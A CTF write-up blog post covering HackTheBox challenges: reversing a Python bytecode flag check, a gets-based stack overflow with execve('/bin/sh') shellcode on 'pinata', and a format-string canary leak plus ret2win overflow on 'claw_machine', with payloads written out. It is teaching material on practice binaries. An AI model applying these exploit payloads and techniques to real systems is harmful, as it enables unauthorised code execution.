It seems like HackTheBox nailed another good CTF this year. The challenges are beginner-friendly while at the same time being trendy. I will highlight cool ones in this blog post. My solve scripts will be available at here.

[rev] SpookyCheck (Medium)

We were given check.pyc, which is a compiled Python binary. What can we do with this type of file? Since the file contains Python bytecode, we can either disassemble it or decompile it. Previously, we have used Decompyle++ for Python bytecode, so let’s use it again!

$ pycdc check.pyc
# Source Generated with Decompyle++
# File: check.pyc (Python 3.11)

KEY = b'SUP3RS3CR3TK3Y'
CHECK = bytearray(b'\xe9\xef\xc0V\x8d\x8a\x05\xbe\x8ek\xd9yX\x8b\x89\xd3\x8c\xfa\xdexu\xbe\xdf1\xde\xb6\\')

def transform(flag):
    return enumerate(flag)()


def check(flag):
Error decompyling check.pyc: vector::_M_range_check: __n (which is 2) >= this->size() (which is 2)

Surprisingly, decompiling this file triggers an assertion in Decompyle++. The error seems to be from std::vector of C++ STL, which is not so helpful in this situation. Rather than fixing the decompiler, I decided to disassemble the file using pycdas, which should read the file as-is. And I love reading assembly!

Since the disassembly output is long, I will quote important parts that help solving the challenge.

First, we find the symbol list used at global:

        'KEY'
        'bytearray'
        'CHECK'
        'transform'
        'check'
        '__name__'
        'print'
        'input'
        'inp'
        'encode'

Cross-checking the partial output from the decompiler, we at least know that KEY and CHECK are two byte-strings. CHECK is probably for final comparison with our input. We don’t know what KEY is for yet. Then there are transform and check functions. Let’s see what they are! Note ahead: you can find documentations for Python opcodes here.

transform
[Disassembly]
    0       RESUME                        0
    2       LOAD_CONST                    1: <CODE> <listcomp>
    4       MAKE_FUNCTION                 0
    6       LOAD_GLOBAL                   1: NULL + enumerate
    18      LOAD_FAST                     0: flag
    20      PRECALL                       1
    24      CALL                          1
    34      GET_ITER                      
    36      PRECALL                       0
    40      CALL                          0
    50      RETURN_VALUE

The disassembly of this function is almost as simple as what the decompiler guesses. But wait! There is a line that loads <CODE> <listcomp> into the stack then creates a function from it. For those who don’t know, listcomp refers to a feature in Python called List Comprehension, a syntactic sugar for transforming any iterable into a list. The ability is similar to a higher-order function, but the functionality is close to a lambda.

After that, transform loads function pointer enumerate and variable flag, then use CALL 1 to call a function with one argument. Behind the scene, CALL finds on the stack NULL at the beginning, enumerate as the callable, and flag as a positional argument in ascending order, pops all of them then eventually pushes the execution result of enumerate(flag) onto the stack. (More details on CALL opcode can be found here). At transform+34, GET_ITER converts the result into an iterable, then we see another CALL. With the state of the stack, we know this is a call to the anonymous <listcomp> function. Let’s see what the function does.

<listcomp>
[Disassembly]
    0       RESUME                        0
    2       BUILD_LIST                    0
    4       LOAD_FAST                     0: .0
    6       FOR_ITER                      54 (to 116)
    8       UNPACK_SEQUENCE               2
    12      STORE_FAST                    1: i
    14      STORE_FAST                    2: f
    16      LOAD_FAST                     2: f
    18      LOAD_CONST                    0: 24
    20      BINARY_OP                     0 (+)
    24      LOAD_CONST                    1: 255
    26      BINARY_OP                     1 (&)
    30      LOAD_GLOBAL                   0: KEY
    42      LOAD_FAST                     1: i
    44      LOAD_GLOBAL                   3: NULL + len
    56      LOAD_GLOBAL                   0: KEY
    68      PRECALL                       1
    72      CALL                          1
    82      BINARY_OP                     6 (%)
    86      BINARY_SUBSCR                 
    96      BINARY_OP                     12 (^)
    100     LOAD_CONST                    2: 74
    102     BINARY_OP                     10 (-)
    106     LOAD_CONST                    1: 255
    108     BINARY_OP                     1 (&)
    112     LIST_APPEND                   2
    114     JUMP_BACKWARD                 55
    116     RETURN_VALUE

The main part we can see here is a loop that covers most of the function: FOR_ITER jumps to <listcomp>+116 after competing the loop. Before that, we see BUILD_LIST, which means the top of the stack and probably what we are working on is a list. In the loop, we have:

  • Unpacking two values from 1st argument: i and f. We know that <listcomp> is called on enumerate(flag) that produces the new iterator with index in the value (for example, [4, 7, 9] into [(0, 4), (1, 7), (2, 9)]), so i means index here, and f is the element of flag.
  • From <listcomp>+16 to <listcomp>+26, f and 24 are pushed on the stack, then it calls BINARY_OP, which means it pops the 2 stack values (in ascending order), performs operation on them, then pushes the result back. The argument for BINARY_OP here is +, so the it pushes f + 24. Eventually, the value would be (f + 24) & 255 (A).
  • From <listcomp>+30 to <listcomp>+86, similarly with CALL and BINARY_OP, we know that the code calls len(KEY) and computes i % len(KEY). What about BINARY_SUBSCR? This is similar to BINARY_OP but with [] operation (for example, when the stack is: [str, 3], the result is str[3]). Eventually, the value would be KEY[i % len(KEY)] (B).
  • From <listcomp>+96 to <listcomp>+108, we have ((A ^ B) - 74) & 255. LIST_APPEND then puts the result into another list that we have created beforehand at <listcomp>+2.

In summary, this list comprehension can be expressed in Python as:

[
    (
        (
            ((f + 24) & 255) ^ KEY[i % len(KEY)]
        ) - 74
    ) & 255
for i, f in enumerate(flag)]

This is the core of the transform function. With speculation, we can predict that check and the rest of the program would be checking transform(user_input) == CHECK. In the list comprehension above, XOR is reversible, modulo would wrap around, and thus transform is a bijection function (one-to-one and onto), which means we can inverse it and find the flag.

[pwn] pinata (Easy)

This is not a first pwn that I solve, but the first one to have writeup on this blog. This would be a reference to any of my future pwn solve.

Running checksec on our target, we identify that this program has no PIE and Stack is executable. Immediately, those made me think of ret2shellcode.

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

Let’s speculate the decompiled view of the program.

Pinata main function

The main function is simple. Since we are looking forward to exploiting the program using user input, let’s look at reader.

Pinata reader function

Pinata reader function - assembly

Jackpot! We found a classic overflow bug in the program: gets. With the input allocated at rbp-0x10 and rbp is pushed at the beginning of the function, we need to override 0x10 + 0x8 = 0x18 bytes before reaching the return address.

Now that we are allowed to change the return address and stack is executable, how can we return to the stack without knowing its address? The answer is simple: push rsp. What this x86 instruction does is pushing the rsp value onto the stack, and rsp is exactly the top of the stack (before pushing). Combining with a ret, we can change the rip to rsp, which is exactly what we wanted. Using rp++, we can find the ROP gadget we want at 0x418c22 (push rsp; ret). We are lucky not having to find the dynamic address since there are no PIE.

With the instruction pointer changing to the stack, what code do we write on the stack? As basic as it can be, I did an execve syscall with /bin/sh as the filename. The syscall number for execve is 59. For argv and envp, I set them to a null pointer. Since "/bin/sh\0" fits on 8 bytes (Little-endian 0x68732f6e69622f), one trick I tried was to push it onto the stack and use rsp as pointer to the string. The following is the final shellcode for const char *const tmp[] = {NULL}; execve("/bin/sh", tmp, tmp);:

mov     rdi, 0x68732f6e69622f
push    rdi
mov     rdi, rsp
push    0
mov     rsi, rsp
mov     rdx, rsp
mov     rax, 59
syscall

(Tips: I used Keystone Engine, a lightning-fast assembler library)

And the payload we send to the program would be:

payload = b"A" * 0x18 + p64(push_rsp) + shellcode

With this, you should be able to access the shell and do cat flag.txt.

[pwn] claw_machine (Medium)

In retrospective, this is not a hard challenge, but certainly an one-step-up from pinata. Starting the program, we can see a simple claw game, and it asks for feedback after the game ends.

Claw_machine gameplay

Claw_machine Feedback

The game is impossible play, so we would not play fair either ;) Here is the checksec of the program.

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'

No hopes for shellcoding. Since there are few input fields after the game ended, let’s search for them in the decompiler. Turns out they are in the fb function.

Claw_machine fb function

The problems in this function are:

  • printf((int64_t)&buf + 3), which is format string vulnerability, and
  • read(0, &var_58h, 0x5e), which we can use to overflow buffer.

Looking at the symbol list of the program, we also find the read_flag function, so this challenge is likely ret2win. Alternatively, it is also possible to leak the libc address by using the format string vulnerability, but I did not find a good place to jump to.

Here is the devised plan.

  1. Leak the stack canary and return address using the format string vulnerability. Because the target OS of the binary is x86_64 Linux, arguments after 6th one would be stored on the stack. This function allocates 0x80 bytes, while the stack canary is at rbp-0x10, thus the distance is 0x70 bytes. Therefore, the canary is at the 21st argument (1 + 6 + (0x70 / 8) = 21). The return address is 0x10 bytes after it, so it would be in the 23rd argument.
  2. Bypass the canary check using the leaked stack canary. It is at rbp-0x10 in the function frame.
  3. Calculate the main address based on the return address that is stored when program call fb, which is subtracting the return address with 53 (main+53 is right after call fb in main).
  4. Override the return address with read_flag address that is calculated based on the leaked main address. Using the buffer overflow bug, we can write starting from rbp-0x50, with the maximum size of 0x5e bytes.

The only “troublesome” part is that the distance between our vulnerable buffer and the return address is 0x58 bytes. This means we can override all the allocated memory after rbp-0x50 on stack (0x48 bytes), stack canary, saved rbp, and only the least significant (bottom) 6 bytes of the return address. However, because we do not jump to stack nor heap address which has different upper 2-byte, this is not a big deal.

The payload for the format string would be: b'%21$p!%23$p!'. I used ! for easier parsing of the output.

And the payload for the buffer overflow would be:

payload = (b''
  +   b'A' * 0x48              # buffer
  +   p64(canary)              # stack canary
  +   b'R' * 8                 # saved rbp
  +   p64(e.sym["read_flag"])  # return address
)[:0x5e]

The flag should be printed out when we successfully exploit the program.